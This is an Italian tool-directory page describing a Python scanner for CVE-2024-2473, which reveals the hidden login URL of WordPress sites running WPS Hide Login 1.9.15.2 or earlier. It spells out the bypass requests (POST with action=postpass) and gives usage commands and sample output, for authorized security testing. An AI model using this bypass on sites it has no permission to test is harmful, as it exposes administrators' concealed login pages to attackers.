Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-2473 — Divulgazione della pagina di login nascosta di WordPress. Rileva la divulgazione della pagina di login nei siti WordPress che utilizzano WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473) | Kitploit
Strumenti/GitHubGitHub/m4xsec/cve-2024-2473
RicognizioneScanner di VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubm4xsec/cve-2024-2473

CVE-2024-2473

Divulgazione della pagina di login nascosta di WordPress. Rileva la divulgazione della pagina di login nei siti WordPress che utilizzano WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)

Vedi Repository
215 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-2473 — Identificatore Pagina di Login Nascosta di WPS Hide Login

Uno scanner Python professionale per rilevare la divulgazione della pagina di login nei siti WordPress che eseguono WPS Hide Login ≤ 1.9.15.2

Python CVE CVSS License Platform

Codificato da Venexy


Indice

  • Panoramica
  • Dettagli della Vulnerabilità
  • Come Funziona
  • Requisiti
  • Installazione
  • Utilizzo
  • Esempio di Output
  • Disclaimer
  • Riferimenti

Panoramica

WPS Hide Login è un popolare plugin per WordPress che consente agli amministratori di modificare l'URL predefinito /wp-login.php in un percorso personalizzato nascosto — agendo come sicurezza tramite oscurità.

Questo scanner rileva CVE-2024-2473, una vulnerabilità in cui il parametro action=postpass può essere fornito per bypassare completamente il meccanismo di protezione del plugin, esponendo l'URL della pagina di login nascosta a utenti non autenticati.


Dettagli della Vulnerabilità

Descrizione

Il plugin WPS Hide Login sposta la pagina di login di WordPress dall'URL predefinito /wp-login.php a un URL personalizzato scelto dall'amministratore. Tuttavia, in tutte le versioni fino alla 1.9.15.2 incluse, fornire il parametro query action=postpass a /wp-login.php o /wp-admin/ bypassa questa protezione, rivelando l'URL effettivo dell'azione del modulo di login nascosto — esponendo di fatto il percorso di login segreto a qualsiasi utente non autenticato.


Come Funziona

Lo scanner replica il flusso di attacco della vulnerabilità in tre fasi:

root@kitploit:~
Fase 1  ─►  Conferma che il target sia un'installazione WordPress
                  │
                  ▼
Fase 2a ─►  POST /wp-login.php?action=postpass
             con corpo: action=lostpassword&post_password=test
             Controllo: HTTP 200 + lostpasswordform presente + nessun wp-login.php nel corpo
             Estrai URL di login nascosto dall'attributo action del modulo
                  │
Fase 2b ─►  POST /wp-admin/?action=postpass
             Controllo: Reindirizzamento HTTP 302 verso una posizione contenente reauth=1 o /login
                  │
                  ▼
             Segnala URL di login nascosto se scoperto

Se la Fase 2a o la Fase 2b corrisponde, il target viene contrassegnato come vulnerabile.


Requisiti

  • Python 3.7 o superiore
  • Libreria requests

Installazione

1. Clona il repository

root@kitploit:~
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473

2. Installa le dipendenze

root@kitploit:~
pip install requests

Nota: Su sistemi che utilizzano ambienti virtuali Python o Kali Linux, potresti aver bisogno di:

root@kitploit:~
pip install requests --break-system-packages

Utilizzo

root@kitploit:~
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]

Argomenti

ArgomentoDescrizionePredefinito
-u, --url

Esempi

root@kitploit:~
# Scansione base
python CVE-2024-2473.py -u https://example.com

# Scansione con timeout personalizzato
python CVE-2024-2473.py -u https://example.com --timeout 15

# Scansione su HTTP
python CVE-2024-2473.py -u http://192.168.1.100

Esempio di Output

root@kitploit:~
 ...

  ┌─────────────────────────────────────────────────────────────┐
  │  CVE-2024-2473  •  Identificatore Pagina di Login WPS Hide  │
  │  Codificato da Venexy | https://github.com/m4xsec               │
  └─────────────────────────────────────────────────────────────┘

  ===============================================================
    TARGET    https://example.com
    ORA      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Fase 1 | Rilevamento installazione WordPress ...
  [18:00:01] [+] WordPress confermato — https://example.com

  [18:00:01] [*] Fase 2 | Test dei vettori di bypass CVE-2024-2473 ...

  [18:00:01] [*] Vettore A | POST /wp-login.php?action=postpass
             +- Stato : 200   Risultato : CORRISPONDENZA

  [18:00:02] [*] Vettore B | POST /wp-admin/?action=postpass
             +- Stato : 302   Risultato : CORRISPONDENZA

  ###############################################################
  ##           VULNERABILITÀ CONFERMATA  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login <= 1.9.15.2
    Gravità        Media (CVSS 5.3 / EPSS 93° percentile)
    CWE             CWE-200 — Esposizione di Informazioni Sensibili
    Vettore CVSS     AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N

  [18:00:02] [VULN] Bypass confermato tramite /wp-login.php?action=postpass

  ====================================================
        URL DI LOGIN NASCOSTO SCOPERT
  ====================================================

  >>  https://example.com/my-secret-admin-path/

  ====================================================

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi.

L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Ottieni sempre esplicita autorizzazione scritta dal proprietario del sistema target prima di condurre qualsiasi valutazione di sicurezza. La scansione o lo sfruttamento non autorizzati dei sistemi sono illegali e non etici.

Usalo in modo responsabile.


Riferimenti


Codificato con ❤️ da Venexy

Se questo strumento ti è stato utile, considera di dare una ⭐ al repository 🌟🌟🌟

Scarica lo strumento
CampoDettagli
ID CVECVE-2024-2473
InteressatoPlugin WPS Hide Login ≤ 1.9.15.2 per WordPress
GravitàMedia
Punteggio CVSS5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWECWE-200 — Esposizione di Informazioni Sensibili
Punteggio EPSS0.10433 (93° percentile)
Autenticazione RichiestaNessuna
FornitoreWPServeur
RimedioAggiornare il plugin alla versione > 1.9.15.2
URL base del target WordPress (obbligatorio)
—
-t, --timeoutTimeout della richiesta HTTP in secondi10
RisorsaLink
NVD — CVE-2024-2473https://nvd.nist.gov/vuln/detail/CVE-2024-2473
Avviso Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
Plugin WPS Hide Loginhttps://wordpress.org/plugins/wps-hide-login/
CWE-200https://cwe.mitre.org/data/definitions/200.html
Calcolatrice CVSS 3.1https://www.first.org/cvss/calculator/3.1